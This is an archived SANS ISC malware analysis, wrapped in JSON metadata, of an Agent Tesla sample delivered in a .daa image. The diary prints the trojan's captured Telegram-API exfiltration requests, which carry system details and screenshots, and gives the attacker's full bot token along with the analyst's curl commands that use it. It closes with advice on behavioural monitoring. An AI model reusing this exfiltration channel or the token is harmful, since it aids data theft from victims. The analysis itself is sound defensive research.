{
	"id": "4f25a5e6-8875-41d7-b406-f332be4aa5c4",
	"created_at": "2026-04-06T00:11:43.197752Z",
	"updated_at": "2026-04-10T03:20:58.032404Z",
	"deleted_at": null,
	"sha1_hash": "b898212a2fafcafc81cf8f99a0845a1d49c16745",
	"title": "Agent.Tesla Dropped via a .daa Image and Talking to Telegram",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 338940,
	"plain_text": "Agent.Tesla Dropped via a .daa Image and Talking to Telegram\r\nBy SANS Internet Storm Center\r\nArchived: 2026-04-05 19:18:35 UTC\r\nA few days ago, I found an interesting file delivered by email (why change a winning combination?). The file has a\r\nnice extension: “.daa” (Direct Access Archive). We already reported such files in 2019 and Didier wrote a diary[1]\r\nabout them. A default Windows installation can’t process “.daa” files; you need a specific tool to open them (like\r\nPowerISO). I converted the archive into an ISO file and extracted the PE file inside it.\r\nThe sample was called “E445333###.exe”\r\n(SHA256: 853a7edf8144e06014e0c1a841d1f1840de954a866d5ce73ff12833394ff0ead) and has a VT score of\r\n48/70[2]. It’s a classic Agent.Tesla, but this one uses another C2 channel to exfiltrate data. Instead of using open email\r\nservers, it uses Telegram (the messenger application). I started to debug the PE file (a classic .Net executable), but it\r\ntook a lot of time before reaching some interesting activity, so I took another approach and went back to a classic\r\nbehavioral analysis. 
I fired a REM Workstation, connected it to the Internet through a REMnux, and launched the\r\nexecutable.\r\nIt took some time (approx 15 mins) before I saw the first connection to api[.]telegram[.]org:\r\nPOST hxxps://api[.]telegram[.]org/bot1815802853:AAFwTZ6mRU-UOmcTcCR8glZAAkNmzHpMkL8/sendDocument HTTP/1\r\nContent-Type: multipart/form-data; boundary=---------------------------8d94d2d30eed79c\r\nHost: api.telegram.org\r\nContent-Length: 983\r\nExpect: 100-continue\r\nConnection: Keep-Alive\r\n-----------------------------8d94d2d30eed79c\r\nContent-Disposition: form-data; name=\"chat_id\"\r\n1599705393\r\n-----------------------------8d94d2d30eed79c\r\nContent-Disposition: form-data; name=\"caption\"\r\nNew Log Recovered!\r\nUser Name: REM/DESKTOP-2C3IQHO\r\nOSFullName: Microsoft Windows 10 Enterprise\r\nCPU: Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz\r\nRAM: 8191.49 MB\r\n-----------------------------8d94d2d30eed79c\r\nContent-Disposition: form-data; name=\"document\"; filename=\"REM-DESKTOP-2C3IQHO 2021-07-22 04-24-32.html\r\nContent-Type: text/html\r\nhttps://isc.sans.edu/diary/27666\r\nPage 1 of 4\n\nTime: 07/22/2021 16:24:31  \nUser Name: REM  \nComputer Name: DESKTOP-2C3IQHO  \nOSFullName: Microsoft\n-----------------------------8d94d2d30eed79c--\nAnd the reply:\nHTTP/1.1 200 OK\nServer: nginx/1.18.0\nDate: Thu, 22 Jul 2021 14:24:34 GMT\nContent-Type: application/json\nContent-Length: 662\nConnection: keep-alive\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: GET, POST, OPTIONS\nAccess-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection\n{\"ok\":true,\"result\":{\"message_id\":6630,\"from\":{\"id\":1815802853,\"is_bot\":true,\"first_name\":\"Bigdealz\",\"u\nA few minutes later, the Trojan started to exfiltrate screenshots:\nPOST hxxps://api[.]telegram[.]org/bot1815802853:AAFwTZ6mRU-UOmcTcCR8glZAAkNmzHpMkL8/sendDocument HTTP/1\nContent-Type: 
multipart/form-data; boundary=---------------------------8d94d3662696c53\nHost: api.telegram.org\nContent-Length: 194635\nExpect: 100-continue\nConnection: Keep-Alive\n-----------------------------8d94d3662696c53\nContent-Disposition: form-data; name=\"chat_id\"\n1599705393\n-----------------------------8d94d3662696c53\nContent-Disposition: form-data; name=\"caption\"\nNew Screenshot Recovered!\nUser Name: REM/DESKTOP-2C3IQHO\nOSFullName: Microsoft Windows 10 Enterprise\nCPU: Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz\nRAM: 8191.49 MB\n-----------------------------8d94d3662696c53\nContent-Disposition: form-data; name=\"document\"; filename=\"REM-DESKTOP-2C3IQHO 2021-07-22 05-30-21.jpeg\nContent-Type: image/jpeg\nJFIF``C\r\n[stuff deleted]\r\nThe file that is uploaded contains a timestamp. This confirmed to me that a screenshot is exfiltrated every hour.\r\nBecause we know the bot ID, we can interact with it.\r\nLet’s check the bot info:\r\nremnux@remnux:~$ curl -s hxxps://api[.]telegram[.]org/bot1815802853:AAFwTZ6mRU-UOmcTcCR8glZAAkNmzHpMkL8\r\n{\r\n \"ok\": true,\r\n \"result\": {\r\n \"id\": 1815802853,\r\n \"is_bot\": true,\r\n \"first_name\": \"Bigdealz\",\r\n \"username\": \"Bigdealzbot\",\r\n \"can_join_groups\": true,\r\n \"can_read_all_group_messages\": false,\r\n \"supports_inline_queries\": false\r\n }\r\n}\r\nThe user the bot is talking to is \"Graciasmith1\" (still online on Telegram when I'm writing this diary). 
Let's make it\r\naware that we are also alive:\r\nremnux@remnux:~$ curl -s hxxps://api[.]telegram[.]org/bot1815802853:AAFwTZ6mRU-UOmcTcCR8glZAAkNmzHpMkL\r\n{\r\n \"ok\": true,\r\n \"result\": {\r\n \"message_id\": 6884,\r\n \"from\": {\r\n \"id\": 1815802853,\r\n \"is_bot\": true,\r\n \"first_name\": \"Bigdealz\",\r\n \"username\": \"Bigdealzbot\"\r\n },\r\n \"chat\": {\r\n \"id\": 1599705393,\r\n \"first_name\": \"Gracia\",\r\n \"last_name\": \"Smith\",\r\n \"username\": \"Graciasmith1\",\r\n \"type\": \"private\"\r\n },\r\n \"date\": 1627107886,\r\n \"text\": \"Ping\"\r\n }\r\n}\r\nAs you can see, today it's very tricky to spot malicious activity just by watching classic IOCs like IP addresses or\r\ndomain names. Unless you prevent your users from accessing social networks like Telegram, who will flag traffic to\r\napi.telegram.org as suspicious? Behavioral monitoring can be the key: you can see requests at regular intervals,\r\noutside business hours, or from hosts that should not execute social network applications. Because your servers can\r\naccess the Internet directly, right? ;-)\r\n[1] https://isc.sans.edu/forums/diary/The+DAA+File+Format/25246\r\n[2] https://www.virustotal.com/gui/file/853a7edf8144e06014e0c1a841d1f1840de954a866d5ce73ff12833394ff0ead/detection\r\nXavier Mertens (@xme)\r\nSenior ISC Handler - Freelance Cyber Security Consultant\r\nPGP Key\r\nSource: https://isc.sans.edu/diary/27666",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://isc.sans.edu/diary/27666"
	],
	"report_names": [
		"27666"
	],
	"threat_actors": [],
	"ts_created_at": 1775434303,
	"ts_updated_at": 1775791258,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b898212a2fafcafc81cf8f99a0845a1d49c16745.pdf",
		"text": "https://archive.orkl.eu/b898212a2fafcafc81cf8f99a0845a1d49c16745.txt",
		"img": "https://archive.orkl.eu/b898212a2fafcafc81cf8f99a0845a1d49c16745.jpg"
	}
}